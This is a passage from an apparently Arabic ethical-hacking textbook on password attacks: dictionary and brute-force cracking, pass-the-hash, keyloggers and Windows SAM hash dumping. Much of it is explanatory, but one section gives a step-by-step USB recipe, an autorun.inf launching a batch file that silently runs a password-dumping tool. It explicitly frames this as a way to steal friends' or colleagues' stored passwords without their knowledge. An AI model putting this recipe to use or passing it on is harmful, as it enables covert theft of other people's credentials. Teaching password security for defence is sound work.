‫اﻟﻣرور ﻷﻧظﻣﺔ ‪ ،Netware ،NT‬وﯾوﻧﯾﻛس‪.‬‬

‫ھﻧﺎك ﻗواﺋم ﻟﻛﻠﻣﺎت اﻟﺳر اﻟﺗﻲ ﯾﻣﻛﻧﮭﺎ ﺗﻐذﯾﺔ ھذه ‪ cracker‬ﻟﺗﻧﻔﯾذ ھﺟوم اﻟﻘﺎﻣوس)‪ . (Dictionary attack‬ﻓﻲ أﺑﺳط أﺷﻛﺎﻟﮭﺎ‪ ،‬ﻓﺎن اﻟﺗﺷﻐﯾل‬
‫اﻵﻟﻲ )‪ (Automated‬ﯾﻧطوي ﻋﻠﻰ اﻟﻌﺛور ﻋﻠﻰ ﻣﺳﺗﺧدم ﺻﺎﻟﺢ وﺧوارزﻣﯾﺔ اﻟﺗﺷﻔﯾر اﻟﻣﺳﺗﺧدﻣﺔ ﺧﺎﺻﺗﮫ‪ ،‬واﻟﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺎت اﻟﺳر‬
‫اﻟﻣﺷﻔرة‪ ،‬وﺧﻠﻖ ﻗﺎﺋﻣﺔ ﻣن ﺟﻣﯾﻊ ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﻣﻛﻧﺔ‪ ،‬ﺗﺷﻔﯾر ﻛل ﻛﻠﻣﺔ‪ ،‬واﻟﺗﺣﻘﻖ ﻣن وﺟود أي ﺗﺳﺎو ﻣﻊ ھوﯾﺔ اﻟﻣﺳﺗﺧدم اﻟﻣﻌروﻓﺔ)‪. (user ID‬‬
‫وﺗﺗﻛرر ھذه اﻟﻌﻣﻠﯾﺔ ﺣﺗﻰ ﯾﺗم اﻟﺣﺻول ﻋﻠﻰ اﻟﻧﺗﺎﺋﺞ اﻟﻣرﺟوة أو ﯾﺗم اﺳﺗﻧﻔﺎد ﺟﻣﯾﻊ اﻟﺧﯾﺎرات‪.‬‬
‫ﻓﻲ أﺑﺳط أﺷﻛﺎﻟﮫ ﻓﺎن ﻛﺳر ﻛﻠﻣﺔ اﻟﺳر ﺗﺗﻛون ﻣن ﺟزأﯾن‪:‬‬
‫‪ -1‬ﺗﺣدﯾد ﻣوﻗﻊ وﺗﺣﻣﯾل ﻣﻠف ھﺎش ﻛﻠﻣﺔ اﻟﺳر ﻟﻠﻧظﺎم اﻟﻣﺳﺗﮭدف‪.‬‬
‫‪ -2‬اﺳﺗﺧدام اﻷدوات ﻟﺗﺣوﯾل ھﺎش )اﻟﻣﺷﻔرة( ﻛﻠﻣﺎت اﻟﺳر إﻟﻰ ﻛﻠﻣﺔ ﻣرور ﻋﺎدﯾﮫ‪.‬‬
‫ﻣﻌظم أﻧظﻣﺔ اﻟﺗﺷﻐﯾل ﻻ ﺗﺧزن ﻛﻠﻣﺔ اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑك اﻟﺗﻲ ﺗدﺧﻠﮭﺎ ﻛﻘﯾﻣﺔ ﻋﺎدﯾﮫ‪ ،‬ﺑل أﻧﮭﺎ ﺗﺧزن ﻓﻲ ھﯾﺋﺔ ﻧﺳﺧﺔ ﻣﺷﻔرة ﻣن ﻛﻠﻣﺔ اﻟﻣرور‪.‬‬
‫وﯾﺳﻣﻰ ھذا اﻹﺻدار ﻣن اﻟﺗﺷﻔﯾر اﻟﮭﺎش)‪.(HASH‬‬
‫ﻣﻌظم أﻧظﻣﺔ اﻟﺗﺷﻐﯾل ﺗﺧزﯾن ھﺎش ﻛﻠﻣﺔ اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑﮭم ﻓﻲ ﻣﻛﺎن واﺣد‪ .‬ھذا اﻟﻣﻠف )‪ (HASH‬ﻋﺎدة ﯾﺣﺗوي ﻋﻠﻰ ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﺷﻔرة‬
‫ﻟﻌدة ﻣﺳﺗﺧدﻣﯾن وﺣﺳﺎﺑﺎت اﻟﻧظﺎم‪ .‬ﻟﻸﺳف‪ ،‬اﻟوﺻول إﻟﻰ ھﺎش ﻛﻠﻣﺔ اﻟﻣرور ﻟﯾﺳت ﺳوى ﻧﺻف اﻟﻣﻌرﻛﺔ ﻟﻣﺟرد ﻋرض أو ﺣﺗﻰ ﺣﻔظ ھﺎش‬
‫ﻛﻠﻣﺔ اﻟﻣرور ﻟﯾﺳت ﻛﺎﻓﯾﺔ ﻟﺗﺣدﯾد اﻟﻧص اﻟﻌﺎدي ﻟﻛﻠﻣﺔ اﻟﻣرور‪ .‬ذﻟك ﻷن ﻣن اﻟﻧﺎﺣﯾﺔ اﻟﻔﻧﯾﺔ ﻟﯾس ﻣن اﻟﻣﻔﺗرض أن ﯾﻛون ﻣن اﻟﻣﻣﻛن اﻟﻌﻣل اﻟﻰ‬
‫اﻟوراء أي ﺗﺣوﯾل اﻟﮭﺎش إﻟﻰ ﻧص ﻋﺎدي‪.‬‬

‫ﻣﻠﺣوظﮫ‪ :‬ھﻧﺎك ھﺟوم ﯾﺳﻣﻰ "‪ " Pass the hash‬اﻟذي ﯾﺳﻣﺢ ﻟك ﺑﺗﻐﯾر أو إﻋﺎدة إرﺳﺎل ﻗﯾﻣﺔ اﻟﮭﺎش ﻣن ﻛﻠﻣﺔ ﻣرور ﻣن أﺟل اﻟﻣﺻﺎدﻗﺔ‬
‫ﻣﻊ اﻟﺧدﻣﺔ اﻟﻣﺣﻣﯾﺔ‪ .‬ﻋﻧد اﺳﺗﺧدام ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم‪ ،‬ﻓﻠﯾس ھﻧﺎك ﺣﺎﺟﺔ ﻟﻛﺳر ﻛﻠﻣﺔ اﻟﺳر واﻛﺗﺷﺎف ﻧﺳﺧﺗﮭﺎ اﻟﻐﯾر ﻣﺷﻔره‪.‬‬

‫ﻣن أﺟل اﻛﺗﺷﺎف اﻟﻧﺳﺧﺔ اﻟﻐﯾر ﻣﺷﻔرة ﻣن ﻛﻠﻣﺔ ﻣرور‪ ،‬ﻓﻧﺣن ﺑﺣﺎﺟﺔ إﻟﻰ ﺑﻌض ﻣن اﻟﺧطوات اﻟﻣﮭﻣﺔ‪:‬‬
‫‪ -‬اﻟﻌﺛور ﻋﻠﻰ ﻣﺳﺗﺧدم ﺻﺎﻟﺢ‪.‬‬
‫‪ -‬ﺗﺣدﯾد ﺧوارزﻣﯾﺔ اﻟﺗﺷﻔﯾر )اﻟﮭﺎش( اﻟﻣﺳﺗﺧدﻣﺔ‪.‬‬
‫‪ -‬اﻟﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﺷﻔرة‪.‬‬
‫‪ -‬إﻧﺷﺎء ﻗﺎﺋﻣﺔ ﻣن ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﻣﻛﻧﺔ‪.‬‬
‫‪ -‬ﺗﺷﻔﯾر ﻛل ﻛﻠﻣﺔ ﺑﺎﺳﺗﺧدام ﻧﻔس اﻟﺧوارزﻣﯾﺔ‪.‬‬
‫‪ -‬ﻣﻌرﻓﺔ ﻣﺎ إذا ﻛﺎن ھﻧﺎك ﺗطﺎﺑﻖ ﻟﻛل ھوﯾﺔ اﻟﻣﺳﺗﺧدم‪.‬‬
‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬
‫‪337‬‬

‫‪Performing Automated Password Guessing‬‬


‫إذا ﻓﺷل اﻟﻣﮭﺎﺟم ﻓﻲ اﻟﮭﺟوم اﻟﯾدوي‪ ،‬ﻓﺄﻧﮫ ﯾﻣﻛن أن ﯾﺧﺗﺎر أن ﯾﺣول اﻟﻌﻣﻠﯾﺔ اﻟﻰ اﻟﮭﺟوم اﻷﻟﻰ )‪ .(Automated attack‬ھﻧﺎك اﻟﻌدﯾد ﻣن‬
‫اﻟﺑراﻣﺞ اﻟﻣﺟﺎﻧﯾﺔ اﻟﺗﻲ ﯾﻣﻛن أن ﺗﺳﺎﻋد ﻓﻲ ھذا اﻟﺟﮭد‪ .‬ﺑﻌض ھذه اﻟﺑراﻣﺞ اﻟﺣرة ھﻲ ‪،Jack the Ripper ،Legion‬‬
‫)‪ ، NetBIOS Auditing Tool (NAT‬اﻟﺦ‪ .‬أﺑﺳط ھذه اﻟطرق ھو اﻻﺳﺗﻔﺎدة ﻣن اﻷﻣر ‪ .net‬ھذا ﯾﻧطوي ﻋﻠﻰ اﻻﺳﺗﺧدام اﻟﺑﺳﯾط ﻟﻠﺣﻠﻘﺔ‬
‫‪ loop‬ﺑﺎﺳﺗﺧدام ﺷل ‪ NT/2000‬ﻣن اﺟل اﺳﺗﺧدام ھذا اﻻﻣر‪ .‬ﻛل ﻣﺎ ﯾﻔﻌﻠﮫ ﺟﻣﯾﻊ اﻟﻣﮭﺎﺟﻣﯾن ھو إﻧﺷﺎء ﻣﻠف ﺑﺳﯾط ﺑﮫ اﺳم اﻟﻣﺳﺗﺧدم وﻛﻠﻣﺔ‬
‫اﻟﺳر‪ .‬ﺛم ﯾﻣﻛن اﻟرﺟوع اﻟﻰ ھذا اﻟﻣﻠف ﻣن ﺧﻼل اﻷﻣر ‪.FOR‬‬

‫‪ Automated password attacks‬ﯾﻣﻛن ﺗﺻﻧﯾﻔﮭﺎ ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬

‫‪ A simple dictionary attack -1‬واﻟذى ﯾﺷﻣل ﺗﺣﻣﯾل ﻣﻠف اﻟﻘﺎﻣوس )اﻟﻣﻠف اﻟﻧﺻﻲ اﻟذى ﯾﺣﺗوى ﻛﻠﻣﺎت اﻟﻘﺎﻣوس( ﻓﻲ ﺗطﺑﯾﻖ‬
‫ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور ﻣﺛل ‪ LOphtCrack‬أو ‪ ،John the Ripper‬ﺛم ﺗﺷﻐﯾﻠﮫ ﺿد ﺣﺳﺎﺑﺎت اﻟﻣﺳﺗﺧدﻣﯾن ﺣﯾث ﯾوﺟد اﻟﺗطﺑﯾﻖ‪.‬‬
‫ھﺟﻣﺎت اﻟﻘﺎﻣوس )‪ (Dictionary attack‬ھﻲ أﻛﺛر ﻓﻌﺎﻟﯾﺔ ﻣﻊ اﻟﻛﻠﻣﺎت اﻟطوﯾﻠﺔ‪.‬‬
‫‪ The brute force method -2‬ھو اﻷﻛﺛر ﺷﻣوﻻ‪ ،‬ﻋﻠﻰ اﻟرﻏم ﻣن ﺑطﺋﮫ‪ .‬ﻋﺎدة ﻣﺎ ﯾﺣﺎول ﻛل ﺣرف ﻣﻣﻛن‪ ،‬وﺗرﻛﯾﺑﺎت اﻷرﻗﺎم ﻓﻲ‬
‫اﻻﺳﺗﻛﺷﺎف اﻵﻟﻲ)‪. (automated exploration‬‬
‫‪ A hybrid approach -3‬ھو واﺣد ﯾﺟﻣﻊ ﺑﯾن ﻣﯾزات ﻛل ﻣن اﻷﺳﺎﻟﯾب اﻟﺳﺎﺑﻘﺔ‪ .‬وﻋﺎدة ﻣﺎ ﯾﺑدأ ﻣﻊ اﻟﻘﺎﻣوس‪ ،‬ﺛم ﯾﺣﺎول ﺗرﻛﯾﺑﺎت ﻣﺛل‬
‫ﻛﻠﻣﺗﯾن ﻣﻌﺎ أو ﻛﻠﻣﺔ وأرﻗﺎم‪.‬‬
‫ﯾﻣﯾل اﻟﻣﺳﺗﺧدﻣﯾن إﻟﻰ اﻣﺗﻼك ﻛﻠﻣﺎت ﺳر ﺿﻌﯾﻔﺔ ﻷﻧﮭم ﻻ ﯾﻌرﻓون ﻣﺎ ھو ﺷﻛل ﻛﻠﻣﺎت اﻟﻣرور اﻟﻘوﯾﺔ‪ ،‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﻻ ﯾﻌرﻓون ﻛﯾﻔﯾﺔ إﻧﺷﺎء ﻛﻠﻣﺎت‬
‫ﻣرور ﻗوﯾﺔ ﻟﺣﺳﺎﺑﺎﺗﮭم‪ .‬ﻛﻣﺎ ھو ﻣﺑﯾن‪ ،‬وھذا ﯾﺗرك ﻛﻠﻣﺎت اﻟﺳر ﻣﻔﺗوﺣﺔ ﻟﻠﮭﺟوم‪.‬‬

‫‪Stealing Passwords Using Usb Drives‬‬


‫ﺳرﻗﺔ ﻛﻠﻣﺎت اﻟﺳر ﺑﺎﺳﺗﺧدام ﻣﺣرك أﻗراص ‪ USB‬ھو ﻧﮭﺞ ﻣﺎدي )‪ (physical approach‬ﻟﻘرﺻﻧﺔ ﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﺧزﻧﺔ ﻓﻲ ﺟﮭﺎز‬
‫اﻟﻛﻣﺑﯾوﺗر‪ .‬ﯾﻣﻛن اﻟﻣﮭﺎﺟﻣﯾن ﺳرﻗﺔ ﻛﻠﻣﺎت اﻟﺳر ﺑﺎﺳﺗﺧدام ﻣﺣرك أﻗراص ‪ USB‬واﻟﺗطﺑﯾﻘﺎت اﻟﻣﺧﺗﻠﻔﺔ‪ .‬اﻟﻧﺎس اﻟذﯾن ﻟدﯾﮭم ﺣﺳﺎﺑﺎت ﻣﺗﻌددة ﻋﻠﻰ‬
‫اﻻﻧﺗرﻧت ﻋﺎدة ﺗﺧزن أﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن وﻛﻠﻣﺎت اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑﮭم ﻋﻠﻰ ﺳﺑﯾل اﻻﺣﺗﯾﺎط ﻻﺳﺗﺧداﻣﮭم إذا ﻣﺎ ﻧﺳﺎھم‪ .‬ﯾﻣﻛﻧك اﺳﺗرداد أو ﺳرﻗﺔ‬
‫وﺛﺎﺋﻖ اﻟﺗﻔوﯾض ھذه ﺑﺎﺳﺗﺧدام ﻣﺣرك أﻗراص‪. USB‬‬
‫اﻟﻧﮭﺞ اﻟﻣﺎدي )‪(physical approach‬ھو أﻣر ﺑﺎﻟﻎ اﻷھﻣﯾﺔ ﺑﺎﻟﻧﺳﺑﺔ ﻟﻠﻘرﺻﻧﺔ ﻛﻠﻣﺎت اﻟﺳر‪ .‬ﯾﻣﻛن ﻟﻠﻣرء ﺳرﻗﺔ ﻛﻠﻣﺎت اﻟﻣرور ﺑﺎﺳﺗﺧدام‬
‫ﻣﺣرك أﻗراص ‪ USB‬واﻟﺗطﺑﯾﻘﺎت‪ .‬ھذا اﻷﺳﻠوب ﯾﻧطﺑﻖ ﻋﻠﻰ ﻗرﺻﻧﺔ ﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﺧزﻧﺔ ﻓﻲ أي ﺟﮭﺎز ﻛﻣﺑﯾوﺗر‪ .‬ﻣﻌظم اﻟﻧﺎس اﻟﻣﺷﺗرﻛﺔ‬
‫ﻓﻲ ﻋدد ﻛﺑﯾر ﻣن اﻟﻣواﻗﻊ ﻋﺎدة ﺗﻘوم ﺑﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑﮭم ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر ﻣن أﺟل ﺗذﻛرھﺎ‪ .‬ﯾﻣﻛن ﻟﻠﻣرء ﻣﺣﺎوﻟﺔ اﻧﺗﺷﺎﻟﮭﺎ ﺗﻠﻘﺎﺋﯾﺎ‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪338‬‬

‫ﺑﺎﺳﺗﺧدام ﻣﺣرك أﻗراص‪ . USB‬ھذا ﯾﺗطﻠب ﺗوﺻﯾل ‪ USB‬ﻓﻲ أي ﻣﻧﻔذ ﻟﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟذي ﺗم ﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﺳر‪ .‬ھذه اﻟﺣﯾﻠﺔ ھﻲ ﻗﺎﺑﻠﺔ‬
‫ﻟﻠﺗطﺑﯾﻖ ل ﻧظﺎم اﻟﺗﺷﻐﯾل‪ ، Windows XP‬وﯾﻧدوز ‪ ،7‬وﯾﻧدوز ﻓﯾﺳﺗﺎ‪ ،‬وﯾﻧدوز ‪.2000‬‬

‫ﺟﻣﯾﻊ اﻟﺗطﺑﯾﻘﺎت اﻟﻣدرﺟﺔ ﻓﻲ ‪ USB‬ھﻲ ﻣﺣﻣوﻟﺔ وﺧﻔﯾﻔﺔ ﺑﻣﺎ ﯾﻛﻔﻲ ﺑﺣﯾث ﯾﻣﻛن ﺗﺣﻣﯾﻠﮭﺎ ﻓﻲ ﻗرص ‪ USB‬ﻓﻲ ﺑﺿﻊ ﺛوان‪ .‬ﯾﻣﻛﻧك أﯾﺿﺎ ﻗرﺻﻧﺔ‬
‫ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﺧزﻧﺔ اﻟﺧﺎﺻﺔ ﺑﺎﻠ ‪ .Messenger‬ﺑﺎﺳﺗﺧدام أدوات و‪ USB‬ﯾﻣﻛﻧك إﻧﺷﺎء ‪ rootkit‬اﻹﺧﺗراق ﻛﻠﻣﺎت اﻟﺳر ﻣن اﻟﻛﻣﺑﯾوﺗر‬
‫اﻟﮭدف‪.‬‬
‫ﺳرﻗﺔ ﻛﻠﻣﺎت اﻟﺳر ﺑﺎﺳﺗﺧدام ﺟﮭﺎز ‪ USB‬ﺗﺗم ﺑﻣﺳﺎﻋدة ﻣن اﻟﺧطوات اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫‪ -1‬ﺗﺣﺗﺎج إﻟﻰ أدوات ﻗرﺻﻧﺔ ﻛﻠﻣﺎت اﻟﻣرور‪.‬‬


‫‪ -2‬ﻧﺳﺦ اﻟﻣﻠﻔﺎت اﻟذي ﻗﻣت ﺑﺗﺣﻣﯾﻠﮭﺎ ذات اﻻﻣﺗداد )‪ (.exe‬واﻟﺗﻲ ﺗﻛون أدوات ﻟﻘرﺻﻧﺔ ﻛﻠﻣﺔ ﻣرور اﻟﻰ ﻣﺣرك اﻷﻗراص ‪.USB‬‬
‫‪ -3‬إﻧﺷﺎء ﻣﺳﺗﻧد ﻓﺎرغ ووﺿﻊ اﻟﻣﺣﺗوﯾﺎت اﻟﺗﺎﻟﯾﺔ أو اﻷﻛواد اﻟﺗﺎﻟﯾﺔ ﻓﯾﮫ‪:‬‬
‫]‪[autorun‬‬
‫‪en=launch.bat‬‬
‫ﺑﻌد ﻛﺗﺎﺑﺔ ھذا اﻟﻣﺣﺗوى ﻓﻲ اﻟﻣﻔﻛرة‪ ،‬ﻧﺣﻔظ اﻟﻣﺳﺗﻧد ك ‪ autorun.inf‬وﻧﺳﺦ ھذا اﻟﻣﻠف إﻟﻰ ﻣﺣرك اﻷﻗراص ‪.USB‬‬

‫‪ -4‬ﻧﻘوم ﺑﺈﻧﺷﺎء ﻣﺳﺗﻧد اﺧر وﻧﻘوم ﺑﻛﺗﺎﺑﺔ اﻟﻣﺣﺗوﯾﺎت اﻟﺗﺎﻟﯾﺔ‪:‬‬


‫‪start pspv.exe/stext pspv.txt‬‬

‫ﺑﻌد ذﻟك‪ ،‬ﻧﻘوم ﺑﺣﻔظ اﻟﻣﻠف ك ‪ launch.bat‬وﻧﺳﺦ ھذا اﻟﻣﻠف إﻟﻰ ﻣﺣرك اﻷﻗراص ‪.USB‬‬
‫‪ -5‬إدراج ﻣﺣرك اﻷﻗراص ‪ USB‬وﻧﺎﻓذة اﻟﺗﺷﻐﯾل اﻟﺗﻠﻘﺎﺋﻲ اﻟﻣﻧﺑﺛﻘﺔ )‪.(if enabled‬‬
‫‪ -6‬ﯾﺗم ﺗﻧﻔﯾذ أدوات ﻗرﺻﻧﺔ ﻛﻠﻣﺎت اﻟﻣرور ﻓﻲ اﻟﺧﻠﻔﯾﺔ‪ ،‬وﯾﻣﻛن ﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﻣرور ﻓﻲ ﻣﻠﻔﺎت ‪ TXT‬ﻓﻲ ﻣﺣرك اﻷﻗراص ‪.USB‬‬

‫ﺑﮭذه اﻟطرﯾﻘﺔ‪ ،‬ﯾﻣﻛﻧك إﻧﺷﺎء ‪ USB password recovery toolkit‬ﺧﺎص ﺑك واﺳﺗﺧداﻣﮫ ﻟﺳرﻗﺔ ﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﺧزﻧﺔ ﻣن أﺻدﻗﺎﺋك أو‬
‫زﻣﻼﺋك ﻣن دون ﻋﻠﻣﮭم‪ .‬ھذه اﻟﻌﻣﻠﯾﺔ ﺗﺳﺗﻐرق ﺳوى ﺑﺿﻊ ﺛوان ﻻﺳﺗرداد ﻛﻠﻣﺎت اﻟﺳر‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪339‬‬

‫‪Stealing Passwords Using Keylogger‬‬


‫ﻛﻠﻣﺎ ﯾﺣﺗﺎج اﻟﻣﮭﺎﺟم ﻗرﺻﻧﺔ ﺷﻲء ﻣﺎ‪ ،‬ﻓﺄﻧﮫ ﯾﻔﻛر ﻋﺎدة ﺣول اﻟﺛﻐرات اﻟﻣﺣﺗﻣﻠﺔ ﻓﻲ اﻟﻌﻣﻠﯾﺔ ﺑرﻣﺗﮭﺎ‪ .‬ﻛﻠﻣﺎت اﻟﺳر ھﻲ ﻗطﻌﺔ ﻣن اﻟﺑﯾﺎﻧﺎت‬
‫اﻟﻣﺳﺗﺧدﻣﺔ ﻟﻠوﺻول إﻟﻰ ﺣﺳﺎب أو ﻧظﺎم‪ .‬اﺧﺗﯾﺎر ﻛﻠﻣﺎت ﻣرور ﻣﻌﻘدة ﯾﺟﻌل ﺣﺳﺎﺑﺎﺗك آﻣﻧﺔ وﯾﺻﻌب اﻟﻣﮭﻣﺔ ﻋﻠﻰ اﻟﻣﮭﺎﺟم‪ .‬ﻛﻠﻣﺔ اﻟﻣرور اﻟﻣﻌﻘدة‬
‫ﺗﺟﻌل ﻣن ﻣﮭﻣﺔ اﻟﻣﮭﺎﺟم ﺻﻌﺑﺔ وﻟﻛﻧﮭﺎ ﻟﯾﺳت ﻣﺳﺗﺣﯾﻠﺔ‪ .‬ﻛﻠﻣﺎت اﻟﻣرور ھﻲ ﻗطﻌﺔ ﻣن اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﺳﺗﻘدم إﻟﻰ ﻧظﺎم أو ﺗطﺑﯾﻖ ﻟﻠوﺻول إﻟﯾﮫ‪.‬‬
‫ﻋﺎدة ﻣﺎ ﯾﺗم إدﺧﺎل ﻛﻠﻣﺎت اﻟﻣرور ﻣن ﺧﻼل ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ‪ .‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﻓﺈذا ﻛﺎن اﻟﻣﮭﺎﺟم ﻟدﯾﮫ ﺑرﻧﺎﻣﺞ أو آﻟﯾﺔ ﻟﺗﺳﺟﯾل ﺿﻐطﺎت اﻟﻣﻔﺎﺗﯾﺢ وإرﺳﺎل‬
‫ﺗﻘرﯾر ﻋن ذﻟك‪ ،‬ﻓﯾﻛون اﻟﻣﮭﺎﺟم ﻟﮫ اﻟﻘدرة ﻋﻠﻰ ﺗﺣدﯾد ﻛﻠﻣﺎت اﻟﺳر ﺑﺳﮭوﻟﺔ‪ .‬اﻟﺑراﻣﺞ اﻟﺗﻲ ﺗﺳﻣﺢ ﻟﮭم ﻟﻠﻘﯾﺎم ﺑذﻟك ھﻲ ‪ ،Keyloggers‬وھو ﻧوع‬
‫ﻣن اﻟﺑرﻣﺟﯾﺎت اﻟﺧﺑﯾﺛﺔ‪ Keyloggers .‬ﯾﻣﻛﻧﮫ ﻛﺷف ﻛل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ اﻟﺗﻲ ﻗﺎم ﺑﮭﺎ اﻟﮭدف ﺑﻣﺎ ﻓﻲ ذﻟك أﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن و ﻛﻠﻣﺎت‬
‫اﻟﻣرور ﻷي ﻣن اﻟﻣواﻗﻊ‪ Keyloggers .‬ﻋن ﺑﻌد ﯾﻣﻛن أن ﯾﻌطﻲ وﺻول اﻟﻣﮭﺎﺟم ﻟﯾس ﻓﻘط إﻟﻰ اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ واﻟﺣﺳﺎﺑﺎت ﻋﻠﻰ اﻻﻧﺗرﻧت‬
‫‪ ،‬وﻟﻛﻧﮫ ﯾﻣﻛن اﺧﺗراق اﻟﺗﻔﺎﺻﯾل اﻟﻣﺎﻟﯾﺔ اﻟﺧﺎﺻﺔ ﺑك ﻛذﻟك‪ .‬وﯾﺳﺗﺧدم ‪ Keyloggers‬ﻣن ﻗﺑل اﻟﻧﺎس ﻟﻠﻌﺛور ﻋﻠﻰ ﻗطﻌﺔ ﻣﻌﯾﻧﺔ ﻣن اﻟﻣﻌﻠوﻣﺎت‬
‫ﻣﺛل اﺳم اﻟﻣﺳﺗﺧدم أو ﻛﻠﻣﺔ اﻟﻣرور‪.‬‬

‫ﯾﻣﺛل اﻟﺗوﺿﯾﺢ اﻟﺗﺻوﯾري اﻟﺗﺎﻟﻲ طرﯾﻖ اﻟﻣﮭﺎﺟﻣﯾن ﻟﺳرﻗﺔ ﻛﻠﻣﺎت اﻟﻣرور ﺑﺎﺳﺗﺧدام ‪.Keyloggers‬‬

‫ﻋﻧد ﺳرﻗﺔ ﻛﻠﻣﺎت اﻟﻣرور‪ ،‬ﻓﺎن اﻟﻣﮭﺎﺟم ﯾﺻﯾب أوﻻ ‪ PC‬اﻟﺿﺣﯾﺔ ﻣﻊ ﺑرﻣﺟﯾﺎت ‪ .Keyloggers‬ﻋﻧد دﺧول اﻟﺿﺣﯾﺔ إﻟﻰ ﺧﺎدم اﻟدوﻣﯾن ﻣن‬
‫ﺧﻼل ﺑﯾﺎﻧﺎت اﻟدﺧول‪ ،‬ﻓﺎن ‪ Keyloggers‬ﺗﻠﻘﺎﺋﯾﺎ ﺗﻘوم ﺑﺈرﺳﺎل ﺑﯾﺎﻧﺎت اﻟدﺧول )اﺳم اﻟﻣﺳﺗﺧدم وﻛﻠﻣﺎت اﻟﺳر( إﻟﻰ اﻟﻣﮭﺎﺟم دون ﻋﻠم اﻟﺿﺣﯾﺔ‪.‬‬
‫ﺑﻣﺟرد ﺣﺻول اﻟﻣﮭﺎﺟم ﻋﻠﻰ ھذه اﻟﺑﯾﺎﻧﺎت اﻋﺗﻣﺎد ﻋﻠﻰ ﺗﺳﺟﯾل دﺧول اﻟﺿﺣﯾﺔ‪ ،‬ﻓﺎﻧﮫ ﯾﻘوم ﺑﺗﺳﺟﯾل اﻟدﺧول إﻟﻰ ﺧﺎدم اﻟدوﻣﯾن ورﺑﻣﺎ اﻟﻘﯾﺎم ﺑﺄي‬
‫ﻋﻣل أﺧر‪.‬‬

‫)‪Offline Password Attacks (HASH Attack‬‬

‫ﻣﻌظم اﻟﻧظم اﻟﺗﻲ ﺗﺳﺗﺧدم آﻟﯾﺔ ﻣﺻﺎدﻗﺔ ﻛﻠﻣﺔ اﻟﻣرور ﺗﺣﺗﺎج إﻟﻰ ﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﻣرور ھذه )أو اﻟﮭﺎش اﻟﺧﺎﺻﺔ ﺑﮭم( ﻣﺣﻠﯾﺎ ﻋﻠﻰ اﻟﺟﮭﺎز‪.‬‬
‫وھذا ﺻﺣﯾﺢ ﺑﺎﻟﻧﺳﺑﺔ ﻷﻧظﻣﺔ اﻟﺗﺷﻐﯾل )وﯾﻧدوز‪ ،‬ﻟﯾﻧﻛس‪ ،‬وﺳﯾﺳﻛو(‪ ،‬وأﺟﮭزة اﻟﺷﺑﻛﺔ )‪ router‬و‪ ،(switch‬اﻟﺦ‪.‬‬
‫وﻏﺎﻟﺑﺎ ﻣﺎ ﯾوﺟﮫ اﻟﻣﮭﺎﺟﻣﯾن ھو اﻟﺣﺻول ﻋﻠﻰ اﻟﮭﺎش ﻣن اﻟﻣﻠف ‪ SAM‬اﻣﺎ ﻹﻋداد ﺧﺎطﻲ او اﺧﺗراق ﻧﺎﺟﺢ‪ .‬وﻛﻣﺎ ﻗﻠﻧﺎ ﺳﺎﺑﻘﺎ ان اﻟﺣﺻول‬
‫ﻋﻠﻰ اﻟﮭﺎش ﯾﻌد ﻧﺻف اﻟﻣﻌرﻛﺔ‪ .‬ﻛﻤﺎ ﻗﻠﻨﺎ ﺳﺎﺑﻘﺎ ان اﻟﻤﻠﻒ ‪ SAM‬ﯾﺘﻤﺘﻊ ﺑﺎﻟﻜﺜﯿﺮ ﻣﻦ اﻟﺤﻤﺎﯾﺔ ﻣﻦ ﻗﺒﻞ ﻧﻈﺎم اﻟﺘﺸﻐﯿﻞ وﯾﻨﺪوز‪ .‬ﻟﺤﺴﻦ اﻟﺤﻆ‪ ،‬ھﻨﺎك‬
‫طﺮﯾﻘﺔ ﻟﺘﺠﺎوز ھﺬه اﻟﻘﯿﻮد ﻋﻠﻰ ﺣﺪ ﺳﻮاء‪.‬‬

‫‪Windows Hash Dumping: Pwdump and Fgdump‬‬


‫‪ Windows Hash Dumping‬ﺗﻧطوي ﻋﻠﻰ ﺗﻔرﯾﻎ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ﻛﻠﻣﺔ اﻟﻣرور ﻟﺟﮭﺎز وﯾﻧدوز واﻟذي ﯾوﺟد ﻓﻲ ﻣﻠف اﻟرﺟﯾﺳﺗري‬
‫‪ NT registry‬ﺗﺣت اﻟﺑﻧد‪ HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users‬او ﺑﻣﻌﻧﻰ اﺧر ﺗﻔرﯾﻎ‬
